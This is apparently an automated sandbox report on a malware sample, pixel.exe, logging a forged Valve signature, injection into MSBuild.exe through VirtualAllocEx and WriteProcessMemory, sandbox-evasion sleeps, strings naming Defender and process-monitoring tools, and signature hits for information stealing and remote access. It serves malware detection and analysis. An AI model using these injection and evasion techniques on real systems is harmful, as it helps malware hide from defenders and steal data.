Source: pixel.exe, xfPIGlnecQhEMdFlQltFxDtoYHqtMJXnkkFOefjQfZEjBCHxCCsIEoNTLBJZUTrtSUtCxQgLcCzxZkNwaTRkqpIVwMdDvjVlIlqG.cs High entropy of concatenated method names: 'ieaLwHFbOpUBOnYbbgcDmyfLNCpTHoPOTgoVTgOIKHhhSBPikUjBiNuKYoXTrMuAzfIIYciVstSFqYTmNhIMeoFfLEXEiUqXmGHM', 'uDhuWYFNXx', 'RSDtfaIkuZ', 'HKUoqAmTQU', 'LZlfQpKKcE', 'jZLBZqGQSq', 'abuPAJJSew', 'MMWcMRHxDP', 'pYiQPHZspZ', 'TwazTJEwEg'

Persistence and Installation Behavior

barindex
Source: Initial sample Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple critical red flags: 1) Certificate claims to be from Valve/Steam but is issued in China (C=CN) which is highly suspicious as Valve is a US company 2) Compilation timestamp is set to year 2072, which is clearly impossible and a common malware technique 3) Signature is invalid and cannot build trust chain to root authority 4) Organization name in issuer is 'SHA384' which appears to be using a hash algorithm name as an organization, highly irregular 5) While the certificate validity dates (2024-2035) are within reasonable range, the combination with other factors suggests this is a fraudulent attempt to impersonate Valve/Steam
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ualbvbed\ualbvbed.dll Jump to dropped file

Boot Survival

barindex
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7700, type: MEMORYSTR
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: Yara match File source: Process Memory Space: pixel.exe PID: 7180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7700, type: MEMORYSTR
Source: pixel.exe, 00000001.00000002.1301294702.000000000311B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
Source: C:\Users\user\Desktop\pixel.exe Memory allocated: 15E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Memory allocated: 30A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Memory allocated: 50A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2E70000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2ED0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 4ED0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 2585 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 7218 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ualbvbed\ualbvbed.dll Jump to dropped file
Source: C:\Users\user\Desktop\pixel.exe TID: 7356 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8040 Thread sleep count: 40 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8040 Thread sleep time: -36893488147419080s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8112 Thread sleep count: 2585 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8112 Thread sleep count: 7218 > 30 Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: pixel.exe, 00000001.00000002.1300562415.0000000001331000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2507110634.0000000001130000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\pixel.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: 1.2.pixel.exe.42895d0.4.raw.unpack, DInvokeCore.cs Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: 1.2.pixel.exe.42895d0.4.raw.unpack, AntiProcess.cs Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
Source: 1.2.pixel.exe.42895d0.4.raw.unpack, SendToMemory.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 1.2.pixel.exe.42895d0.4.raw.unpack, SendToMemory.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 1.2.pixel.exe.42895d0.4.raw.unpack, SendToMemory.cs Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: 1.2.pixel.exe.42895d0.4.raw.unpack, SendToMemory.cs Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
Source: 1.2.pixel.exe.42895d0.4.raw.unpack, SendToMemory.cs Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)
Source: C:\Users\user\Desktop\pixel.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe File written: C:\Users\user\AppData\Local\Temp\ualbvbed\ualbvbed.0.cs Jump to dropped file
Source: C:\Users\user\Desktop\pixel.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000 Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 57C000 Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 57E000 Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FE0008 Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ualbvbed\ualbvbed.cmdline" Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF78D.tmp" "c:\Users\user\AppData\Local\Temp\ualbvbed\CSC8105DABD276423EB6AF1AADCCB8F43.TMP" Jump to behavior
Source: MSBuild.exe, 00000009.00000002.2508103719.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2508103719.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2508103719.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: MSBuild.exe, 00000009.00000002.2508103719.00000000031BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager`,
Source: MSBuild.exe, 00000009.00000002.2508103719.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2508103719.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2508103719.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe
Source: MSBuild.exe, 00000009.00000002.2508103719.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2508103719.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2508103719.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager@\
Source: C:\Users\user\Desktop\pixel.exe Queries volume information: C:\Users\user\Desktop\pixel.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7700, type: MEMORYSTR
Source: pixel.exe, 00000001.00000002.1301294702.000000000311B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MSASCui.exe
Source: pixel.exe, 00000001.00000002.1301294702.000000000311B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: procexp.exe
Source: MSBuild.exe, 00000009.00000002.2507110634.0000000001130000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: pixel.exe, 00000001.00000002.1301294702.000000000311B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000009.00000002.2508103719.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2508103719.00000000031BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2512600887.0000000005700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7700, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 00000009.00000002.2508103719.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2508103719.00000000031BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2512600887.0000000005700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7700, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs